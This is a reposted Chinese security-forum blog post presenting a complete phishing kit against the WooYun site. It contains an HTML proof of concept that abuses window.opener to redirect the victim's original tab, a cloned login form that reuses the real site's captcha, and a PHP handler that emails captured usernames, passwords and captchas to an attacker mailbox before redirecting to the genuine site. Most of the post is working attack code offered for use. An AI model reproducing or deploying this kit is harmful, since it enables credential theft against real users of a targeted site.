首先请看演示:http://zonewooyun.sinaapp.com/poc/poc.html
帖子链接:http://zone.wooyun.org/content/11465
前几天想到的方法,晚上没事儿做了一个
效果不是很好,大部分小伙伴都不上当。纯属测试 勿喷。
poc.html
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script> parent.window.opener.location="http://zonewooyun.sinaapp.com/login/"; </script> <p>哥们!你还真信啊?</p>
这里实现的是打开链接后原页面跳转了,也就是
http://zone.wooyun.org/content/11465
跳转至钓鱼页面
http://zonewooyun.sinaapp.com/login/
/login/index.php—假的登陆页面
<form id="formLogin" action="login.php" method="post" onsubmit="return Check()">
<table class="formTable">
<tbody>
<tr>
<th width="100">邮箱:</th>
<td><input id="user" name="user" type="text" style="width: 150px" /></td>
</tr>
<tr>
<th>密码:</th>
<td><input id="pwd" name="pwd" type="password" style="width: 150px" /></td>
</tr>
<tr>
<th width="100">验证码:</th>
<td><input id="captcha" name="captcha" type="text" style="width:85px" maxlength="25" />
<img title="点击刷新验证码" align="top" src="http://zone.wooyun.org/captcha.php?770287" onclick="this.src='http://zone.wooyun.org/captcha.php?'+Math.random()" style="cursor:pointer" /></td>
</tr>
<tr>
<th> </th>
<td><input type="submit" class="subbtn" value="登录" /></td>
login.php—-钓鱼接收页面
<meta http-equiv="refresh" content="0.1;url=http://zone.wooyun.org">
<?php
$us=$_POST['user'];
$pw=$_POST['pwd'];
$ca=$_POST['captcha'];
$mail = new SaeMail();
$mail->quickSend(
"***@126.com" ,
"test账号密码" ,
".$pw..$ca.$us." ,
"***@126.com" ,
"密码"
);
$mail->clean();
// 重用此对象
$mail->quickSend(
"***@126.com" ,
"test账号密码" ,
".$pw..$ca.$us." ,
"***@126.com" ,
"密码" ,
"smtp.126.com" ,
25
); // 指定smtp和端口
?>
这里接收账号密码,同时跳转至zone首页
个人觉得普通用户上当的可能性还是比较大的,仓促之间做的,不是很完善。
转自:http://lcx.cc/?i=4265
转载请注明:jinglingshu的博客 » 一个钓鱼方法
